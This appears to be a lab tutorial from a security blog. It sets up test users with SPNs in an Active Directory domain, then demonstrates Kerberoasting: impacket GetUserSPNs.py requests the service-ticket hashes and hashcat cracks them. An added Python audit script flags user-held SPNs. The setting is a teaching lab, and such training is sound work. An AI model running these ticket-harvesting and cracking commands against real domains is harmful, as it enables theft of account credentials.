Having already set up Active Directory as described at https://vk9-sec.com/active-directory-dns-lab/, we can register SPNs for testing purposes.

Using Kerberos authentication requires both of the following conditions to be true:

  • The client and server computers must be part of the same Windows domain, or in trusted domains.
  • A Service Principal Name (SPN) must be registered with Active Directory, which assumes the role of the Key Distribution Center in a Windows domain.

The SPN is sent to the Key Distribution Center to obtain a security token for authenticating the connection. If a security token can’t be obtained, authentication uses NTLM.

SPN Formats

Beginning with SQL Server 2008, the SPN format was changed to support Kerberos authentication over TCP/IP, named pipes, and shared memory. The supported SPN formats for named and default instances are as follows.

Named instance

  • MSSQLSvc/<FQDN>:[<port> | <instancename>], where:
    • MSSQLSvc is the service that is being registered.
    • <FQDN> is the fully qualified domain name of the server.
    • <port> is the TCP port number.
    • <instancename> is the name of the SQL Server instance.

Default instance

  • MSSQLSvc/<FQDN>:<port> | MSSQLSvc/<FQDN>, where:
    • MSSQLSvc is the service that is being registered.
    • <FQDN> is the fully qualified domain name of the server.
    • <port> is the TCP port number.

SPN format                        Description
MSSQLSvc/<FQDN>:<port>            The provider-generated default SPN when TCP is used. <port> is a TCP port number.
MSSQLSvc/<FQDN>                   The provider-generated default SPN for a default instance when a protocol other than TCP is used. <FQDN> is a fully qualified domain name.
MSSQLSvc/<FQDN>:<instancename>    The provider-generated default SPN for a named instance when a protocol other than TCP is used. <instancename> is the name of an instance of SQL Server.

Procedure

1. Add two users that will later have SPNs registered on them

  • Server Manager – Tools – Active Directory Users and Computers
  • Users

2. Right-click Users and add a new user

  • Users – New – User
  • Next

NOTE: I will add user1 & user2

3. Then set a password for each. In this example:

  • user1/Password1
  • user2/Password2

4. With the user accounts created, register an SPN for each of them

  • echo %computername%
  • setspn -A WIN2K19-AD/user1.vk9-sec.com vk9-sec\user1
  • setspn -A WIN2K19-AD/user2.vk9-sec.com vk9-sec\user2

5. Confirm these were added

  • setspn -T vk9-sec.com -Q */*

Testing Kerberoasting tools

1. Get the domain users

  • python3.9 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all vk9-sec.com/user1:Password1 -dc-ip 192.168.0.100

2. Get the users that have SPNs registered, and save the output to tgs.hash

  • python3.9 /opt/impacket/examples/GetUserSPNs.py vk9-sec.com/user1:Password1 -dc-ip 192.168.0.100 -request -output tgs.hash

3. Check the new file's contents; the users' TGS hashes are listed

  • cat tgs.hash

4. Crack the hashes using hashcat

  • hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt --force --potfile-disable

Note: both user1 and user2 were cracked using only user1's credentials, since any authenticated domain user can request service tickets for accounts that have an SPN.
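As an added example (not code from the original post), the following Python parses SPNs in the MSSQLSvc formats listed earlier and audits a `setspn -Q */*` listing for SPNs registered on user objects, the accounts a Kerberoasting tool requests tickets for. The setspn output is a constructed sample modelled on the lab above, and treating the Users container as the marker of a user account is an assumption.

```python
import re

# <service class>/<FQDN>[:<port> | <instancename>], the formats listed above.
SPN_RE = re.compile(r"^(?P<service>[^/\s]+)/(?P<fqdn>[^:/\s]+)(?::(?P<suffix>\S+))?$")

def parse_spn(text: str) -> dict:
    """Split an SPN into service class, FQDN and a TCP port or instance name."""
    m = SPN_RE.match(text.strip())
    if not m:
        raise ValueError(f"not an SPN: {text!r}")
    spn = {"service": m["service"], "fqdn": m["fqdn"], "port": None,
           "instance": None, "kind": "default"}
    suffix = m["suffix"]
    if suffix is None:                        # MSSQLSvc/<FQDN>
        return spn
    if suffix.isdigit():                      # MSSQLSvc/<FQDN>:<port>
        spn["port"] = int(suffix)
    else:                                     # MSSQLSvc/<FQDN>:<instancename>
        spn.update(instance=suffix, kind="named")
    return spn

# Constructed sample of `setspn -T vk9-sec.com -Q */*` output: each account DN
# is followed by the SPNs registered on it, one per indented line.
SETSPN_OUTPUT = """\
CN=WIN2K19-AD,OU=Domain Controllers,DC=vk9-sec,DC=com
\tMSSQLSvc/win2k19-ad.vk9-sec.com:1433
\tHOST/WIN2K19-AD
CN=user1,CN=Users,DC=vk9-sec,DC=com
\tWIN2K19-AD/user1.vk9-sec.com
CN=user2,CN=Users,DC=vk9-sec,DC=com
\tWIN2K19-AD/user2.vk9-sec.com
Existing SPN found!
"""

def spns_by_account(listing: str) -> dict:
    """Map each account DN in a setspn -Q listing to the SPNs it holds."""
    accounts, current = {}, None
    for line in listing.splitlines():
        if line.startswith("CN="):
            current = line.strip()
            accounts[current] = []
        elif line[:1] in ("\t", " ") and current:
            accounts[current].append(line.strip())
    return accounts

def user_held_spns(listing: str) -> dict:
    """SPNs held by objects in the Users container (DN heuristic, assumed here):
    the accounts GetUserSPNs.py targets, so give them long random passwords."""
    return {dn: s for dn, s in spns_by_account(listing).items()
            if ",CN=Users," in dn and s}
```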